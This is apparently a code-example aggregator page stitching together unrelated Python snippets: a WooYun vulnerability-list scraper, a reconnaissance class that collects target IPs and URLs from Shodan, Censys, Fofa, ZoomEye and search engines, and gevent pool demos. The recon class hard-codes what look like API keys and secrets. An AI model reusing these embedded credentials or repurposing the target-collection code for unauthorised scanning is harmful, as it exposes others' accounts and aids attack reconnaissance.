                    bug_info_tmp = bug_info_tmp[0]
                    bug_info['id'] = bug_info_tmp[0]
                    bug_info['name'] = bug_info_tmp[1]
                    self.get_bug_detail(bug_info_tmp[0], bug_info)
                    self.bugs.append(bug_info)
        except Exception as e:
            print('[-] Analyse Error! Detail: {0}'.format(str(e)))

    @staticmethod
    def get_bug_detail(bug_id, bug_info):
        page_url = WOOYUN_BUG_DETAIL + str(bug_id)
        while True:
            try:
                req = requests.get(page_url, headers=HEADER, timeout=15)
                if req.status_code == 200:
                    break
            except Exception as e:
                print('[-] BUG: {0} Get Error: {1}'.format(str(bug_id), str(e)))
        content = req.text
        reg_pattern = '<p class="detail">漏洞Rank:(.*?)</p>'
        bug_info_tmp = re.findall(reg_pattern, content)
        bug_info['rank'] = bug_info_tmp[0].strip()
        reg_pattern = '<h3 class=\'wybug_corp\'>相关厂商:(.*)\s(.*?)</a>'
        bug_info_tmp = re.findall(reg_pattern, content)
        bug_info['corp'] = bug_info_tmp[0][0].strip() + bug_info_tmp[0][1].strip()

    def start(self):
        i_count = 1
        while self.have_content:
            self.pool.map(self.get_one_page, [x for x in range(i_count, i_count + 50)])
            gevent.wait()
            i_count += 50
        print(self.bugs)
        file_handle = open('wy_no_1.csv', 'w')
        file_handle.write('bug_id, rank, name, corp, date\n')
        for one_bug in self.bugs:
            file_handle.write('{0}, {1}, {2}, {3}, {4}\n'.
                              format(one_bug['id'], one_bug['rank'], one_bug['name'], one_bug['corp'], one_bug['date']))
            print(one_bug)
        file_handle.close()
Пример #14
0
class TargetCollect(object):
    def __init__(self, info):
        self.pool = ThreadPool(30)
        self.page = 80
        self.headers = {
            'Connection': 'close',
            'Upgrade-Insecure-Requests': '1',
            'User-Agent':
            "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; AcooBrowser; .NET CLR 1.1.4322; .NET CLR 2.0.50727)",
            'Accept':
            'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8',
            'Accept-Encoding': 'gzip, deflate, sdch, br',
            'Accept-Language': 'zh-CN,zh;q=0.8',
        }
        self.urls_result = set()
        self.ips_result = set()
        self.ips_filename = "IP.txt"
        self.urls_filename = "URL.txt"
        self.proxy = {
            'http': 'http://127.0.0.1:1080',
            'https': 'http://127.0.0.1:1080'
        }

        self.shodan_url = "https://api.shodan.io/shodan/host/search?query=apache&key=MM72AkzHXdHpC8iP65VVEEVrJjp7zkgd"
        self.shodan_token = "XHSWncMjN6MEyekECTMcOeoEocl6VO2q"
        self.shodan_keyword = info['shodan']

        self.censys_url = "https://censys.io/api/v1/search/ipv4"
        self.censys_api_id = "9b611dbd-366b-41b1-a50e-1a024004609f"
        self.censys_secret = "wAUW4Ax9uyCkD7JrgS1ItJE5nHQD5DnR"
        self.censys_keyword = info['censys']

        self.fofa_email = "*****@*****.**"
        self.fofa_token = "xxxx"
        self.fofa_keyword = info['fofa']

        self.zoomeye_url = "https://api.zoomeye.org/host/search?page={}&query={}"
        self.zoomeye_user = "******"
        self.zoomeye_pass = "******"
        self.zoomeye_keyword = info['zoomeye']
        self.zoomeye_pool = ThreadPool(10)

        self.baidu_url = "http://www.baidu.com/s?wd={}&pn={}0"
        self._360_url = "https://www.so.com/s?q={}&pn={}&fr=so.com"
        self.google_url = "https://www.google.com/search?q={}&safe=strict&start={}"
        self.keyword = info['b3g']

    def Shodan(self):
        try:
            api = shodan.Shodan(self.shodan_token)
            services = api.search(self.shodan_keyword)
            for service in services['matches']:
                print "[\033[0;39;40mShodan\033[0m] {}".format(
                    service["ip_str"] + ":" + str(service["port"]))
                self.ips_result.add(service["ip_str"] + ":" +
                                    str(service["port"]))
        except:
            print "[\033[0;35;40mShodan\033[0m] Error"
            pass

    def Censys(self):
        try:
            r = requests.post(self.censys_url,
                              auth=(self.censys_api_id, self.censys_secret),
                              json={"query": self.censys_keyword},
                              headers=self.headers,
                              verify=False,
                              timeout=15)
            json_data = r.json()
            for service in json_data["results"]:
                for i in service['protocols']:
                    port = re.sub("\D", "", i)
                    print "[\033[0;31;40mCensys\033[0m] {}".format(
                        service["ip"] + ":" + port)
                    self.ips_result.add(service["ip"] + ":" + port)
        except:
            print "[\033[0;35;40mCensys\033[0m] Error"
            pass

    def Fofa(self, page=2):
        try:
            client = fofa.Client(self.fofa_email, self.fofa_token)
            for page in xrange(1, page):
                data = client.get_data(self.fofa_keyword,
                                       page=page,
                                       fields="ip,port")
                for ip, port in data["results"]:
                    print "[\033[0;32;40mFofa\033[0m] {}".format(ip + ":" +
                                                                 str(port))
                    self.ips_result.add(ip + ":" + str(port))
        except:
            print "[\033[0;35;40mFofa\033[0m] Error"
            pass

    def Zoomeye(self, page):
        def get_token(zoomeye_user, zoomeye_pass):
            try:
                data = {"username": zoomeye_user, "password": zoomeye_pass}
                data_encoded = json.dumps(data)
                data = requests.post(url='https://api.zoomeye.org/user/login',
                                     data=data_encoded)
                return json.loads(data.text)['access_token']
            except:
                pass
                print "[\033[0;35;40mZoomeye Token\033[0m] Error"

        try:
            token = get_token(self.zoomeye_user, self.zoomeye_pass)
            if not token:
                return
            r = requests.get(
                url="https://api.zoomeye.org/host/search?page={}&query={}".
                format(str(page), self.zoomeye_keyword),
                headers={'Authorization': 'JWT ' + token},
                verify=False,
                timeout=15)
            data = json.loads(r.text)
            for i in data['matches']:
                print "[\033[0;34;40mZoomeye\033[0m] {}".format(
                    i['ip'] + ':' + str(i['portinfo']['port']))
                self.ips_result.add(i['ip'] + ':' + str(i['portinfo']['port']))
        except:
            print "[\033[0;35;40mZoomeye\033[0m] Error"
            pass

    def Baidu(self, page):
        try:
            base_url = self.baidu_url.format(str(self.keyword), str(page))
            r = requests.get(base_url,
                             headers=self.headers,
                             verify=False,
                             timeout=15)
            p = etree.HTML(r.content)
            tags = p.xpath(u'//a[@class="c-showurl"]')
            for tag in tags:
                r = requests.get(tag.get('href'),
                                 headers=self.headers,
                                 verify=False,
                                 timeout=15)
                soup = BeautifulSoup(r.content, 'html.parser')
                chardet.detect(r.content)
                title = soup.title.string if soup.title.string else ''
                if r.url and r.url not in self.urls_result:
                    print "[\033[0;36;40mBaidu\033[0m] {}\t{}".format(
                        r.url, title)
                    self.urls_result.add(r.url)
        except:
            # print "[\033[0;35;40mBaidu\033[0m] Error"
            pass

    def _360(self, page):
        try:
            base_url = self._360_url.format(str(self.keyword), str(page))
            r = requests.get(base_url,
                             headers=self.headers,
                             verify=False,
                             timeout=15)
            soup = BeautifulSoup(r.text, "html.parser")
            for a in soup.select('li.res-list > h3 > a'):
                r = requests.get(a['href'],
                                 headers=self.headers,
                                 verify=False,
                                 timeout=15)
                url = re.findall("URL='(.*?)'", r.text)[0] if re.findall(
                    "URL='(.*?)'", r.text) else r.url
                soup = BeautifulSoup(r.content, 'html.parser')
                chardet.detect(r.content)
                title = soup.title.string if soup.title.string else ''
                if url and url not in self.urls_result:
                    print "[\033[0;37;40m360\033[0m] {}\t{}".format(url, title)
                    self.urls_result.add(url)
        except:
            # print "[\033[0;35;40m360\033[0m] Error"
            pass

    def Google(self, page=2):
        try:
            for i in xrange(0, 10 * page, 10):
                base_url = self.google_url.format(self.keyword, str(i))
                r = requests.get(base_url, headers=self.headers, timeout=15)
                soup = BeautifulSoup(r.text, "html.parser")
                for j in soup.select('div.g > h3.r > a[href^="/url"]'):
                    url = j.get('href').replace('/url?q=', '')
                    print "[\033[0;40;40m360\033[0m] {}".format(url)
                    self.urls_result.add(url)
        except:
            # print "[\033[0;35;40m360\033[0m] Error"
            pass

    def main(self):
        try:
            if self.keyword:
                self.pool.map(self.Baidu, xrange(self.page))
                self.pool.join()
                self.pool.map(self._360, xrange(self.page))
                self.pool.join()
                self.Google()
            if self.zoomeye_keyword:
                self.zoomeye_pool.map(self.Zoomeye, xrange(self.page))
                self.zoomeye_pool.join()

            if self.shodan_keyword: self.Shodan()
            if self.fofa_keyword: self.Fofa()
            if self.censys_keyword: self.Censys()

            if self.ips_result:
                print "[+] Found [{}] ips".format(len(self.ips_result))
                with open(self.ips_filename, "w") as f:
                    for ip in self.ips_result:
                        f.write(ip.strip() + "\n")
            if self.urls_result:
                print "[+] Total Found [{}] urls".format(len(self.urls_result))
                with open(self.urls_filename, "w") as f:
                    for url in self.urls_result:
                        f.write(url.strip() + "\n")
        except:
            traceback.print_exc()
Пример #15
0
print('Unordered')

igroup = Group()
for i in igroup.imap_unordered(intensive, xrange(3)):
    print(i)


import gevent
from gevent.pool import Pool

pool = Pool(2)

def hello_from(n):
    print('Size of pool %s' % len(pool))

pool.map(hello_from, xrange(3))



from gevent.pool import Pool

class SocketPool(object):

    def __init__(self):
        self.pool = Pool(1000)
        self.pool.start()

    def listen(self, socket):
        while True:
            socket.recv()